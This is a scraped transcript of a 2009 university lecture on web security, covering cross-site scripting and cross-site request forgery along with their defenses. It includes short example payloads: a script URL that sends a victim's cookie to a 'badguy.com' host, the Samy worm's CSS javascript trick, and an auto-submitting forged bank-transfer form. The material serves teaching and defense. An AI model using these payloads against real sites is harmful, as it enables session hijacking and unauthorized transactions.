Presentation is loading. Please wait.

Presentation is loading. Please wait.

Nick Feamster CS 6262 Spring 2009

Published byCarter Scott Modified over 10 years ago

Similar presentations

Presentation on theme: "Nick Feamster CS 6262 Spring 2009"— Presentation transcript:

1 Nick Feamster CS 6262 Spring 2009
Web Security Nick Feamster CS 6262 Spring 2009

2 Cross-Site Scripting Overview
Attack Server visit web site 1 receive malicious page 2 send valuable data 5 3 User Victim 4 click on link echo user input Server Victim 2

3 The Setup User input is echoed into HTML response.
Example: search field ? term = apple search.php responds with: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . . . </BODY> </HTML> Is this exploitable? 3

4 Bad Input Consider link: (properly URL encoded)
? term = <script> window.open( “ = ” + document.cookie ) </script> What if user clicks on this link? Browser goes to victim.com/search.php Victim.com returns <HTML> Results for <script> … </script> Browser executes script: Sends badguy.com cookie for victim.com 4

5 So What? Why would user click on such a link?
Phishing in webmail client (e.g. gmail). Link in doubleclick banner ad … many many ways to fool user into clicking What if badguy.com gets cookie for victim.com ? Cookie can include session auth for victim.com Or other data intended only for victim.com Violates same origin policy 5

6 Much Worse Attacker can execute arbitrary scripts in browser
Can manipulate any DOM component on victim.com Control links on page Control form fields (e.g. password field) on this page and linked pages. Example: MySpace.com phishing attack injects password field that sends password to bad guy. 6

7 Types of XSS vulnerabilities
DOM-Based (local) Problem exists within a page’s client-side script Non-persistent (“reflected”) Data provided by a Web client is used by server-side scripts to generate a page for that user Persistent (“stored”) Data provided to an application is first stored and later displayed to users in a Web page Potentially more serious if the page is rendered more than once

8 Example Persistent Attack
Mallory posts a message to a message board When Bob reads the message, Mallory’s XSS steals Bob’s auth cookie Mallory can now impersonate Bob with Bob’s auth cookie

9 Example Non-Persistent Attack
Bob’s Web site contains an XSS vulnerability Mallory convinces Alice to click on a URL to exploit this vulnerability The malicious script enbedded in the URL executes in Alice’s browser, as if coming from Bob’s site This script could, e.g., Alice’s cookie to Bob

10 MySpace.com (Samy worm)
Users can post HTML on their pages MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://> … but can do Javascript within CSS tags: <div style=“background:url(‘javascript:alert(1)’)”> And can hide “javascript” as “java\nscript” With careful javascript hacking: Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend. Samy had millions of friends within 24 hours. 10

11 Defenses needed at server
Attack Server visit web site 1 receive malicious page 2 send valuable data 5 3 User Victim 4 click on link echo user input Server Victim 11

12 Avoiding XSS Bugs Main problem:
Input checking is difficult many ways to inject scripts into HTML. Preprocess input from user before echoing it PHP: htmlspecialchars(string) &  & "  " '  ' <  < >  > htmlspecialchars( "<a href='test'>Test</a>", ENT_QUOTES); Outputs: <a href='test'>Test</a> 12

13 httpOnly Cookies GET … Browser Server HTTP Header:
Set-cookie: NAME=VALUE ; HttpOnly Cookie sent over HTTP(s), but not accessible to scripts cannot be read via document.cookie Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs. Another approach: Restrict use of cookies to some IP address HttpOnly in IE can be written to by script, but cannot be read 13 13

14 Cross Site Request Forgery

15 Overview Server Victim establish session 1 send forged request 4 2
visit server 3 User Victim receive malicious page Attack Server Q: how long do you stay logged on to Gmail? 15

16 Recall: session using cookies
Browser Server POST/login.cgi Set-cookie: authenticator GET… Cookie: authenticator response

17 Cross Site Request Forgery (XSRF)
Example: User logs in to bank.com. Does not sign off. Session cookie remains in browser state Then user visits another site containing: <form name=F action= <input name=recipient value=badguy> … <script> document.F.submit(); </script> Browser sends user auth cookie with request Transaction will be fulfilled Problem: cookie auth is insufficient when side effects can occur 17

18 Login CSRF

19 CSRF Defenses Secret token Check referer (sic) header
Place nonce in page/form from honest site Check nonce in POST Confirm part of ongoing session with server Token in POST can be HMAC of session ID in cookie Check referer (sic) header Referer header is provided by browser, not script Unfortunately, often filtered for privacy reasons Use custom headers via XMLHttpRequest This requires global change in server apps 19

20 CSRF Recommendations Login CSRF HTTPS sites, such as banking sites
Strict Referer validation Login forms typically submit over HTTPS, not blocked HTTPS sites, such as banking sites Use strict Referer validation to protect against CSRF Other Use Ruby-on-Rails or other framework that implements secret token method correctly Future Alternative to Referer with fewer privacy problems Send only on POST, send only necessary data 20

Download ppt "Nick Feamster CS 6262 Spring 2009"

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Cross Site Scripting (XSS)

Cross Site Scripting (XSS)
Cookie Same Origin Policy Dan Boneh CS 142 Winter 2009 Monday: session management using cookies.

Cookie Same Origin Policy Dan Boneh CS 142 Winter 2009 Monday: session management using cookies.
Cross-site Request Forgery (CSRF) Attacks

Cross-site Request Forgery (CSRF) Attacks
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.
Session Management Dan Boneh CS 142 Winter 2009. Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be.

Session Management Dan Boneh CS 142 Winter Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.

Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery.

CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Similar presentations

Ads by Google